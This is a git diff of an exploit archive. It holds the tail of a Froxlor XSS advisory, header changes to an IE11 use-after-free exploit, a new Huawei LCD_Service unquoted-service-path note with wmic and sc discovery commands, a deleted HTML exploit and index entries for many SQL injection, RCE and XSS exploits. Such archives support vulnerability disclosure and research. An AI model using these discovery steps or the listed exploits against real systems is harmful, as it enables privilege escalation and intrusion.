+custom_notes=&custom_notes_show=0&diskspace=0&traffic=0&subdomains=0&emails=0&email_accounts=0& +email_forwarders=0&email_imap=0,1&email_pop3=0,1&ftps=0&mysqls=0&phpenabled=0,1&allowed_phpconfigs[]=1& +perlenabled=0&dnsenabled=0&logviewenabled=0 +- +POST: HTTP/2.0 200 OK +server: Apache +vary: Accept-Encoding +content-encoding: gzip +content-length: 1393 +content-type: text/html; charset=UTF-8 + + +Reference(s): +https://froxlor.localhost:8080/ +https://froxlor.localhost:8080/admin_traffic.php +https://froxlor.localhost:8080/admin_traffic.php?s=[x]&page=customers + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by follwing the next steps ... +1. Validate and escape the content of the vulnerable username, name and +firstname input fields +2. Restrict the input fields and disallow specialchars on inputs to filter +3. Parse the two output location and escape or secure encode the content +4. Encode in the edit formular the results on check + + +Security Risk: +============== +The security risk of the persistent validation web vulnerability in the +web-application is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/exploits/windows/local/48806.txt b/exploits/windows/local/49062.txt similarity index 96% rename from exploits/windows/local/48806.txt rename to exploits/windows/local/49062.txt index 9f6dbb123..b9fe73d1f 100644 --- a/exploits/windows/local/48806.txt +++ b/exploits/windows/local/49062.txt @@ -1,12 +1,11 @@ -# Exploit Title: Internet Explorer 11 - Use-After-Free -# Google Dork: if applicable -# Date: 2020-09-06 -# Exploit Author: Tgroup -# Vendor Homepage: Microsoft.com -# Version: IE 11 (REQUIRED) -# Tested on: Windows 7 x64 +# Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free +# Date: 2020-05-07 +# Exploit Author: maxpl0it +# Vendor Homepage: https://www.microsoft.com/ +# Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx +# Version: IE 8, 9, 10, and 11 +# Tested on: Windows 7 (x64) # CVE : CVE-2020-0674 - @@ -15,7 +14,7 @@ // ------------------------------------------------------------------------------------------------- // // Credits: -// Tgroup () - Writing the exploit +// maxpl0it (@maxpl0it) - Writing the exploit // Qihoo 360 - Identifying the vulnerability in the wild // // @@ -38,7 +37,8 @@ // 11 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64) // // Further notes: -// +// Video at https://twitter.com/maxpl0it/status/1253396942048104448 +// // The debug is better viewed in the console. Open Developer Tools and enable debug below. // // This is the non-EMET-bypassing version and only handles the stack pivot check and EAF. diff --git a/exploits/windows/local/49066.txt b/exploits/windows/local/49066.txt new file mode 100644 index 000000000..2483ad8c6 --- /dev/null +++ b/exploits/windows/local/49066.txt @@ -0,0 +1,34 @@ +# Exploit Title: Huawei LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path +# Date: 2020-11-07 +# Exploit Author: Gerardo González +# Vendor Homepage: https://consumer.huawei.com/mx +# Software Link: https://consumer.huawei.com/mx +# Version: 1.0.1.0 +# Tested on: Windows 10 Home Single Language x64 Esp + +# Step to discover the unquoted Service: + +C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ + +# Service info: + +Huawei LCD_Service LCD_Service C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe Auto + +C:\Users\gerar>sc qc "LCD_Service" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: LCD_Service + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Huawei LCD_Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +# A successful attempt would require the local user to be able to insert their code in the system root path +# undetected by the OS or other security applications where it could potentially be executed during +# application startup or reboot. If successful, the local user's code would execute with the elevated +# privileges of the application. \ No newline at end of file diff --git a/exploits/windows/remote/46928.html b/exploits/windows/remote/46928.html deleted file mode 100644 index 8d9519a69..000000000 --- a/exploits/windows/remote/46928.html +++ /dev/null @@ -1,130 +0,0 @@ - - - - - - - - - - - - - - - - -
-
- Content -
-
- - - \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5c84751a0..b87781e04 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10379,7 +10379,7 @@ id,file,description,date,author,type,platform,port 48795,exploits/windows/local/48795.txt,"Input Director 1.4.3 - 'Input Director' Unquoted Service Path",2020-09-09,"TOUHAMI Kasbaoui",local,windows, 48796,exploits/windows/local/48796.py,"Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)",2020-09-09,"Felipe Winsnes",local,windows, 48803,exploits/linux/local/48803.py,"Gnome Fonts Viewer 3.34.0 - Heap Corruption",2020-09-11,"Cody Winkler",local,linux, -48806,exploits/windows/local/48806.txt,"Internet Explorer 11 - Use-After-Free",2020-09-11,"Simon Zuckerbraun",local,windows, +49062,exploits/windows/local/49062.txt,"Microsoft Internet Explorer 11 - Use-After-Free",2020-11-17,maxpl0it,local,windows, 48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows, 48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows, 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows, @@ -11198,6 +11198,7 @@ id,file,description,date,author,type,platform,port 48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows, 48776,exploits/windows/local/48776.py,"BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH_ASLR_DEP)",2020-08-31,emalp,local,windows, 48789,exploits/windows/local/48789.txt,"BarracudaDrive v6.5 - Insecure Folder Permissions",2020-09-03,boku,local,windows, +49066,exploits/windows/local/49066.txt,"LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path",2020-11-17,"Gerardo González",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18139,7 +18140,6 @@ id,file,description,date,author,type,platform,port 46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php, 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php, 46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php, -46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows, 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos, 46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows, 46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java, @@ -18296,6 +18296,8 @@ id,file,description,date,author,type,platform,port 48651,exploits/multiple/remote/48651.txt,"Qmail SMTP 1.03 - Bash Environment Variable Injection",2020-07-08,1F98D,remote,multiple, 48657,exploits/windows/remote/48657.py,"CompleteFTP Professional 12.1.3 - Remote Code Execution",2020-07-09,1F98D,remote,windows, 48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux, +49067,exploits/multiple/remote/49067.py,"Aerospike Database 5.1.0.3 - OS Command Execution",2020-11-17,"Matt S",remote,multiple, +49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40868,11 +40870,14 @@ id,file,description,date,author,type,platform,port 49045,exploits/php/webapps/49045.sh,"October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)",2020-11-13,"Sivanesh Ashok",webapps,php, 49046,exploits/php/webapps/49046.txt,"Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)",2020-11-16,"Matthew Aberegg",webapps,php, 49048,exploits/php/webapps/49048.txt,"Water Billing System 1.0 - 'id' SQL Injection (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php, -49051,exploits/php/webapps/49051.txt,"Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php, +49059,exploits/php/webapps/49059.txt,"Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection",2020-11-17,"Ramil Mustafayev",webapps,php, 49052,exploits/php/webapps/49052.txt,"User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection",2020-11-16,"Mayur Parmar",webapps,php, 49054,exploits/php/webapps/49054.txt,"PMB 5.6 - 'chemin' Local File Disclosure",2020-11-16,41-trk,webapps,php, 49055,exploits/php/webapps/49055.txt,"Car Rental Management System 1.0 - Remote Code Execution (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php, 49056,exploits/php/webapps/49056.txt,"Car Rental Management System 1.0 - 'car_id' Sql Injection",2020-11-16,"Mehmet Kelepçe",webapps,php, +49058,exploits/php/webapps/49058.txt,"EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass",2020-11-17,"Kislay Kumar",webapps,php, +49060,exploits/php/webapps/49060.txt,"SugarCRM 6.5.18 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php, +49061,exploits/php/webapps/49061.txt,"WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php, @@ -43290,3 +43295,4 @@ id,file,description,date,author,type,platform,port 48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php, 48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php, 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php, +49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,